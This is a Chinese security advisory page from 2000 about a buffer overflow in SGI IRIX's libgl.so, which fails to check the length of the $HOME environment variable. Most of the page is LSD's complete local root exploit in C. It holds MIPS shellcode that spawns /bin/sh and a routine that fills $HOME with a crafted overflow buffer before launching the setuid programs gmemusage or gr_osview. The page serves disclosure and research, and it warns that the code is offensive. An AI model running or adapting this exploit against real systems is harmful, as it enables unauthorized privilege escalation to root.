首页 -> 安全研究
安全研究
安全漏洞
IRIX libgl.so 缓冲区溢出
发布日期:2000-08-04
更新日期:2000-08-04
受影响系统:
不受影响系统:
SGI IRIX 6.2
描述:
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.4
SGI IRIX 6.5.3m
SGI IRIX 6.5.3f
SGI IRIX 6.5.3
SGI IRIX 6.5.2m
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
某些版本IRIX下libgl.so存在一个缓冲区溢出,libgl.so提供了对OpenGL的支持,所
有用到这个库的应用程序都被牵连。libgl.so在处理$HOME环境变量的时候没有仔细
检查该变量值的长度,导致缓冲区溢出。如果受牵连的应用程序setuid-to-root,则
普通用户会获取root权限。
<* 来源:LSD contact@lsd-pl.net *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*## libgl.so $HOME #*/
#define ADRNUM 500
#define PCHNUM 320
#define TMPNUM 500
#define NOPNUM 740
#define ALLIGN 3
char shellcode[] =
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char jump[] =
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
char nop[] = "\x24\x0f\x12\x34";
main ( int argc, char * argv[] )
{
char buffer[10000], adr[4], pch[4], tmp[4], *b, *envp[2];
int i, n = -1;
printf( "copyright LAST STAGE OF DELIRIUM sep 1997 poland //lsd-pl.net/\n" );
printf( "libgl.so $HOME for irix 6.2 IP:20,22\n\n" );
if ( argc != 2 )
{
printf( "usage: %s {gmemusage|gr_osview}\n", argv[0] );
exit( -1 );
}
if ( !strcmp( argv[1], "gmemusage" ) )
{
n = 0;
}
if ( !strcmp( argv[1], "gr_osview" ) )
{
n = 1;
}
if ( n == -1 )
{
exit( -1 );
}
*( ( unsigned long * )adr ) = ( *( unsigned long ( * ) () )jump )()
+ 10268 + 252 + 824 + 500;
*( ( unsigned long * )pch ) = ( *( unsigned long ( * ) () )jump )()
+ 10268 + 252 + 824 + 31868;
*( ( unsigned long * )tmp ) = ( *( unsigned long ( * ) () )jump )()
+ 10268;
envp[0] = buffer;
envp[1] = 0;
b = buffer;
sprintf( b, "HOME=" );
b += 5;
for ( i = 0; i < ALLIGN; i++ )
{
*b++ = 0xff;
}
for ( i = 0; i < TMPNUM; i++ )
{
*b++ = tmp[ i % 4 ];
}
*b++ = 0xff;
for ( i = 0; i < PCHNUM; i++ )
{
*b++ = pch[ i % 4 ];
}
for ( i = 0; i < ALLIGN; i++ )
{
*b++ = 0xff;
}
for ( i = 0; i < ADRNUM; i++ )
{
*b++ = adr[ i % 4 ];
}
for ( i = 0; i < NOPNUM; i++ )
{
*b++ = nop[ i % 4 ];
}
for ( i = 0; i < strlen( shellcode ); i++ )
{
*b++ = shellcode[ i ];
}
*b = 0;
switch ( n )
{
case 0:
execle( "/usr/sbin/gmemusage", "lsd", 0, envp );
break;
case 1:
execle( "/usr/sbin/gr_osview", "lsd", 0, envp );
break;
}
}
建议:
暂无
浏览次数:5781
严重程度:0(网友投票)
绿盟科技给您安全的保障